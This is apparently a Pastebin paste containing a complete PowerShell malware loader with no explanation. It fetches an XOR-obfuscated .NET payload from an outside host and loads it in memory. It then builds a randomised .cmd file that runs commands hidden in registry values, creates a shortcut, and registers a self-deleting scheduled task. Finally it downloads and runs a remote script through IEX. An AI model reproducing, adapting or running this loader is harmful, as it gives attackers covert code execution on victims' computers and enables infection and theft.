Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $bExists = [System.IO.File]::Exists($fileName)
- if (-Not $bExists) {
- "" | Set-Content $fileName
- $bytes = (New-Object Net.WebClient).DownloadData("https://dlm.grogau.com/?f2lnsQGKYqoGuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv/DWmhFcHLLkAlCKJK/mX6+9WjQfBawwc0BcDp2w4=")
- for($i=0; $i -lt $bytes.count; $i++) {
- $bytes[$i] = $bytes[$i] -bxor 0x6A
- }
- [Reflection.Assembly]::Load($bytes)
- $rInt = [Loader]::randomInt(4, 16)
- $prefix = "$([Loader]::RandomString($rInt))-"
- [Loader]::Go3("https://dlm.grogau.com","dmJvugeFYqECuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv6NXK6DerhCEAmIqIR/mGlr+CvEK9CkVAwAw==","dmFgvA2DYKoC9JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxRPkVlFE8UJI=","dmhmsQSGY6sK9ZtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3R3+WEH/0b3VI3DJ61jgwv","dmFjvgGLYaIB8ptBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3QdhBsXp21wq",$prefix)
- $var1 = [Loader]::RandomString($rInt)
- $var2 = [Loader]::RandomString($rInt)
- $var3 = [Loader]::RandomString($rInt)
- $cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"
- $cmdSource = "@Echo off`r`n"
- $cmdSource += "Setlocal EnableExtensions`r`n"
- $cmdSource += "Setlocal EnableDelayedExpansion`r`n"
- $cmdSource += "Set $var1=HKCU`r`n"
- $cmdSource += "Set $var1=%$var1%\Software`r`n"
- $cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
- $cmdSource += "Set $var2=`r`n"
- $cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
- $cmdSource += "Set $var3=%%11`r`n"
- $cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
- $cmdSource += "Set $var2=!$var2!%%3`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += "%$var2%`r`n"
- $cmdSource | Set-Content $cmdFileName
- $lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
- $WshShell = New-Object -comObject WScript.Shell
- $Shortcut = $WshShell.CreateShortcut($lnkFilename)
- $Shortcut.TargetPath = $cmdFileName
- $Shortcut.WindowStyle = 7
- $Shortcut.Save()
- $TaskStartTime = [datetime]::Now.AddSeconds(5)
- $TaskEndTime = [datetime]::Now.AddSeconds(35)
- $taskName = [Loader]::RandomString($rInt)
- $service = New-Object -ComObject("Schedule.Service")
- $service.Connect()
- $rootFolder = $service.GetFolder("\")
- $TaskDefinition = $service.NewTask(0)
- $TaskDefinition.RegistrationInfo.Description = ""
- $TaskDefinition.Settings.Enabled = $true
- $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
- $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
- $triggers = $TaskDefinition.Triggers
- $trigger = $triggers.Create(1)
- $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.Enabled = $true
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = $cmdFileName
- $action.Arguments = ""
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = "schtasks.exe"
- $action.Arguments = "/Delete /TN $taskName /F"
- $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
- $urlPL = "https://dlm.grogau.com/?dmFguwGEZqsF8JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMV0A9QUrGfk="
- IEX(New-Object Net.WebClient).DownloadString("https://dlm.grogau.com/?cWRjvAKCZaYCuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJvnNXLCEPnUC3g8MqFS/mLE+9OkOKRA8F45SMK8jwkkY1wC")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement